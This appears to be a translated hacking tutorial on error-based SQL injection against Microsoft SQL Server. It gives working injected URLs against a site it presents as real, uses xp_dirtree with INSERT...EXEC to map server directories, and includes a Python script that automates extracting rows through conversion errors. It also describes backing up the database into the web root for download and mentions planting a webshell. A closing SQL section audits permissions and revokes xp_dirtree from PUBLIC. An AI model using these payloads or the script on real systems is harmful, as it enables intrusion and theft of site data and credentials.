Weird SQL Injection

Source: Internet
Author: User

SQL injection keeps producing new, unusual variants, so this article looks at one of the odd corners of the technique, because that is where the interesting parts live. Microsoft SQL Server (MS SQL) has long given us a great deal of convenience through its stored procedures, and today injection against it mostly relies on IIS error pages and MS SQL's own error messages to make judgements: we use SELECT to construct special statements that make the server raise an error, and the error text gives us deeper information, such as the names of databases and tables. Can we get more detailed information than that, for example the directory names on the server's disks? The answer is yes, and the trick is a surprising one. Let's go through it step by step.
Start the MS SQL Query Analyzer and enter the following.
Permission check: xp_dirtree is executable by PUBLIC by default, so any login, not only SA, can run it.
Statement: exec master.dbo.xp_dirtree 'c:'

The result set has two columns, subdirectory and depth. subdirectory is a character column (nvarchar) and depth is an integer column. What are you thinking? Don't worry, let's continue.
Statement: create table dirs (paths varchar(100), id int)
Purpose: you are familiar with CREATE TABLE, but this particular table plays a key role: its two columns match the two columns returned by xp_dirtree above, a character column followed by an integer column, which paves the way for the next step. The answer is coming.
Statement: insert dirs exec master.dbo.xp_dirtree 'c:'
Purpose: looks odd? Is there something wrong with this INSERT? No. The principle is that INSERT ... EXEC works as long as the columns of the target table line up, in number and type, with the columns the stored procedure returns. Compared with the conventional INSERT table (COLUMN) VALUES (VALUES), the VALUES clause is replaced by the stored procedure call master.dbo.xp_dirtree 'c:', so the procedure's whole result set is written into the table. Once we can write a procedure's output into a table, we can use undocumented stored procedures to gather the information we want, step by step.
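The whole table-writing trick, as an added example you can run in Query Analyzer or SSMS (this is not code from the original article). It assumes xp_dirtree returns two columns (subdirectory, depth) when called with one or two arguments, which is the case on SQL Server 2000 and later; the directory name 'Inetpub' in step 5 and the path e:\web are illustrative assumptions.

```sql
-- Added example (not from the original article): the INSERT ... EXEC trick
-- end to end, including the error-based read-back the injected page relies on.
USE tempdb;
GO
-- 1. Staging table whose columns line up with xp_dirtree's result set:
--    subdirectory -> paths (character), depth -> id (integer).
--    Caveat: a subdirectory name longer than 100 characters makes the whole
--    INSERT fail with a truncation error; widen the column if that happens.
IF OBJECT_ID('dbo.dirs') IS NOT NULL DROP TABLE dbo.dirs;
CREATE TABLE dbo.dirs (paths varchar(100), id int);
GO
-- 2. INSERT ... EXEC: the procedure's result set is written straight into the
--    table.  No VALUES clause; the column count and types just have to match.
INSERT INTO dbo.dirs EXEC master.dbo.xp_dirtree 'c:';
GO
-- 3. Inside Query Analyzer we can simply read the table back.
SELECT paths, id FROM dbo.dirs ORDER BY id, paths;
GO
-- 4. What the injected page sees instead: compare an int with a varchar to force
--    the conversion error (80040e07 via OLE DB); the first directory name is in
--    the error text.  Caveat: a purely numeric directory name converts fine and
--    raises no error, so the walk would silently stop there.
SELECT 1 WHERE 0 <> (SELECT TOP 1 paths FROM dbo.dirs);
GO
-- 5. Walk the rest of the table by excluding the rows already seen.
SELECT 1 WHERE 0 <> (SELECT TOP 1 paths FROM dbo.dirs WHERE paths NOT IN ('Inetpub'));
GO
-- 6. One level of a specific directory (second argument = depth) instead of the
--    whole partition tree, as the article does for e:\web.
IF OBJECT_ID('dbo.dirs1') IS NOT NULL DROP TABLE dbo.dirs1;
CREATE TABLE dbo.dirs1 (paths varchar(100), id int);
INSERT INTO dbo.dirs1 EXEC master.dbo.xp_dirtree 'e:\web', 1;
SELECT paths FROM dbo.dirs1;
GO
```

Step 4 is the same statement the article later injects through list.asp; running it here first shows exactly which error text the application will echo back.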
Do you understand the above? It doesn't matter if not: practice beats theory, so let's do it. The following uses a real website as the test target. Note: the connection used in the tests below does not have SA permissions.
Statement: http://www.xxxxx.com/down/list.asp?Id=1
Return: Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string.
/down/list.asp, line 21
Test the permission structure (fixed server roles first, then the database role):
Statement 1: http://www.xxxxx.com/down/list.asp?Id=1 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
Statement 2: http://www.xxxxx.com/down/list.asp?Id=1 and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
Statement 3: http://www.xxxxx.com/down/list.asp?Id=1 and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
Statement 4: http://www.xxxxx.com/down/list.asp?Id=1 and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
Statement 5: http://www.xxxxx.com/down/list.asp?Id=1 and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
Statement 6: http://www.xxxxx.com/down/list.asp?Id=1 and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
Statement 7: http://www.xxxxx.com/down/list.asp?Id=1 and 1=(SELECT IS_MEMBER('db_owner'));--
(The remaining fixed server roles, processadmin and dbcreator, are tested the same way. IS_SRVROLEMEMBER returns 1 when the login is a member, so the page renders normally only for a role the connection actually holds.)
In the actual test only the db_owner statement returned the page normally, so the connection's permission in the database is db_owner (owner of the "down" database). That lets us skip enumerating database names; the earlier article "Cross-database query: play it how you want" already covered that, so refer to it. With db_owner we get the administrator table and its contents, so there are two ways to go further. One: all fields are exposed, so we use the management backend's username and password; the difficulty is finding the path of the management backend, which is hard labor. Two: write a WEBSHELL directly through BACKUP; the difficulty is finding the web directory.
Guessing the management backend path by hand has a very low success rate, so we use xp_dirtree to get the information we want. The following method may be simpler. This is its first publication; perhaps many friends are already using it, but it is absolutely good: we write the directory listing into a table.
Statement: http://www.xxxxx.com/down/list.asp?Id=1;create table dirs (paths varchar(100), id int)--
Return: normal page. The table has been created. Continue.
Statement: http://www.xxxxx.com/down/list.asp?Id=1;insert dirs exec master.dbo.xp_dirtree 'c:'--
Return: normal page, which means the directory listing of drive C has been written into the table. Now we read the table back, one row at a time.
Statement: http://www.xxxxx.com/down/list.asp?Id=1 and 0<>(select top 1 paths from dirs)--
Return: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value '@Inetpub' to a column of data type int.
The first directory name is in the error text. Exclude it with NOT IN and repeat, and the directory names in the table come out one after another:
Statement: http://www.xxxxx.com/down/list.asp?Id=1 and 0<>(select top 1 paths from dirs where paths not in ('@Inetpub'))--
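The read-back loop above is done by hand in the article, one URL per directory. The following is an added example (not the article's tooling) that automates it: build the probe, parse the leaked name out of the 80040e07 error, add it to the NOT IN list and repeat. It goes one step beyond the article's statement by selecting '~'+paths instead of paths, so a purely numeric directory name still fails the int conversion instead of silently ending the walk. The target is simulated by a FakeTarget class so the script runs offline; its directory names and error text are constructed to mirror the messages quoted above, and the parameter name Id and page /down/list.asp are taken from the article.

```python
"""Automate the one-row-at-a-time walk through the 'dirs' table.

Added example, not from the original article.  FakeTarget stands in for
/down/list.asp on a database whose 'dirs' table was filled by xp_dirtree; its
rows and error text are constructed sample data.
"""
import re
from typing import Callable, List, Optional

# The value SQL Server tried and failed to cast to int.  Both the 2000-era
# wording ("Syntax error converting the varchar value 'X' to a column of data
# type int") and the newer "Conversion failed when converting the varchar
# value 'X'" contain this fragment.
LEAK = re.compile(r"varchar value '([^']*)'", re.IGNORECASE)

# Prefixed to every row so a numeric directory name such as '2008' still
# breaks the int conversion.  This is the one deviation from the article's probe.
MARKER = "~"


def leaked_value(response: str) -> Optional[str]:
    """Return the string that leaked through the conversion error, or None."""
    m = LEAK.search(response)
    return m.group(1) if m else None


def sql_literal(value: str) -> str:
    """Quote a value for the injected NOT IN (...) list."""
    return "'" + value.replace("'", "''") + "'"


def build_probe(table: str, seen: List[str]) -> str:
    """Injected Id value forcing int <> varchar on the next row not yet seen."""
    probe = f"1 and 0<>(select top 1 '{MARKER}'+paths from {table}"
    if seen:
        probe += " where paths not in (" + ",".join(sql_literal(s) for s in seen) + ")"
    return probe + ")--"


def walk_table(send: Callable[[str], str], table: str = "dirs", limit: int = 1000) -> List[str]:
    """Read every distinct 'paths' value from `table`, one error page per row.

    `send(param)` submits the injectable Id parameter and returns the response
    body.  The walk ends when a page comes back without a conversion error
    (no rows left), when a row repeats, or after `limit` rows.
    """
    seen: List[str] = []
    for _ in range(limit):
        value = leaked_value(send(build_probe(table, seen)))
        if value is None or not value.startswith(MARKER):
            break
        value = value[len(MARKER):]
        if value in seen:
            break
        seen.append(value)
    return seen


class FakeTarget:
    """Offline stand-in for /down/list.asp; constructed data, not a real host."""

    ERROR = (
        "Microsoft OLE DB Provider for SQL Server error '80040e07'\n"
        "Syntax error converting the varchar value '{}' to a column of data type int.\n"
        "/down/list.asp, line 21"
    )
    NORMAL = "<html><title>Download list</title><body>...</body></html>"

    def __init__(self, rows: List[str]) -> None:
        self.rows = list(rows)  # contents of 'dirs', in the order TOP 1 returns them

    def send(self, param: str) -> str:
        # Only the NOT IN (...) list of the probe is interpreted; everything else is fixed.
        excluded = set()
        m = re.search(r"not in \((.*)\)\)--$", param)
        if m:
            excluded = {v.replace("''", "'") for v in re.findall(r"'((?:[^']|'')*)'", m.group(1))}
        marker = MARKER if f"'{MARKER}'+paths" in param else ""
        for row in self.rows:
            if row not in excluded:
                return self.ERROR.format(marker + row)
        return self.NORMAL


if __name__ == "__main__":
    sample = ["Inetpub", "Program Files", "2008", "WINNT"]  # constructed rows
    print(walk_table(FakeTarget(sample).send))
```

Against a real target, `send` would be a function that puts the probe into the Id parameter of the request and returns the body; keep the NOT IN list in mind, because the injected URL grows by one literal per directory read.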
Finally, using the same method, we find the site's web directory under E:\WEB. Two options remain: dig further for the management backend, or get a WEBSHELL directly through BACKUP. The success rate of the BACKUP route is not that high, so let's guess the management backend first. xp_dirtree is used again, but when it is pointed at a whole partition it returns the entire directory tree, which is easy to get lost in; so this time we list just one level of the directory we care about, into a second table:
Statement: http://www.xxxxx.com/down/list.asp?Id=1;create table dirs1 (paths varchar(100), id int)--
Statement: http://www.xxxxx.com/down/list.asp?Id=1;insert dirs1 exec master.dbo.xp_dirtree 'e:\web',1--
Statement: http://www.xxxxx.com/down/list.asp?Id=1 and 0<>(select top 1 paths from dirs1)--
After walking the table row by row, we finally find a directory named xxxadminlogin. At a glance this could be the management backend directory we dream of. Contain your excitement; we continue:
Statement: http://www.xxxxx.com/down/xxxadminlogin/
Return: the login page appears! Good, lucky! We already have usernames and passwords, and now the login URL. Go in...
Note that xp_dirtree returns only the directory tree, not file names, so this works because the login page sits in its own directory under the site root. The directory names still have to be interpreted by human guesswork, so finding the backend login through xp_dirtree is noisy and intrusive, and it is also where personal judgement comes in.
Let's also talk about using BACKUP to get a WEBSHELL, or simply backing up the database with the current permissions. With the ready-made GETWEBSHELL tool you can write a trojan into the web directory and get a WEBSHELL easily. To get the member information instead, backing up the whole database into the web directory by hand is also a good way:
Statement: http://www.xxxxx.com/down/list.asp?Id=1;declare @a sysname;set @a=db_name();backup database @a to disk='e:\web\down.bak';--
Then download it. Enjoy, friends.
This article introduces a variant of the table-writing technique. It does not involve much technical knowledge; it just gives you one more way of constructing statements. In this article the website's connection was not a member of any fixed server role, and from that position there are not many built-in extended stored procedures that can be used for injection, since most of them can only be called by users with relatively high permissions; xp_dirtree, which PUBLIC can execute, was enough. A secure website therefore depends on the administrator allocating permissions sensibly. Have you noticed this?
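The conclusion is about permission allocation, so here is the corresponding audit and fix, as an added example (not from the original article): who may execute xp_dirtree, revoking it from PUBLIC, checking what the web application's login can do, and looking for the staging tables an attacker leaves behind. It assumes SQL Server 2005 or later for the catalog views (the REVOKE itself also works on 2000); the login name webapp and the database name down are assumptions for illustration.

```sql
-- Added example (not from the original article): audit and remove the
-- conditions the technique depends on.  Run as a sysadmin.
USE master;
GO
-- 1. Who may run xp_dirtree?  A row for 'public' means every login can.
SELECT USER_NAME(p.grantee_principal_id) AS grantee, p.permission_name, p.state_desc
FROM sys.database_permissions AS p
WHERE p.major_id = OBJECT_ID('master.dbo.xp_dirtree');
GO
-- 2. Take it away from PUBLIC.  Grant it back only to the specific principals
--    that genuinely need it, if any.
REVOKE EXECUTE ON master.dbo.xp_dirtree FROM public;
GO
-- 3. Check what the web application's login can do.  The article's connection
--    was db_owner of the site database; it should be neither that nor a member
--    of any fixed server role.
USE down;                         -- assumed site database
GO
EXECUTE AS LOGIN = 'webapp';      -- assumed application login
SELECT IS_SRVROLEMEMBER('sysadmin')    AS is_sysadmin,
       IS_SRVROLEMEMBER('bulkadmin')   AS is_bulkadmin,
       IS_MEMBER('db_owner')           AS is_db_owner,
       HAS_PERMS_BY_NAME('master.dbo.xp_dirtree', 'OBJECT', 'EXECUTE') AS can_exec_dirtree;
REVERT;
GO
-- 4. Forensics: the technique leaves staging tables behind (dirs, dirs1 in the
--    article).  Recently created tables in the site database are worth a look.
SELECT name, create_date
FROM sys.tables
ORDER BY create_date DESC;
GO
```

Every column in step 3 should come back 0 for the application login; a 1 in can_exec_dirtree after step 2 means the login was granted the permission explicitly or through another role, and that grant needs the same treatment.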
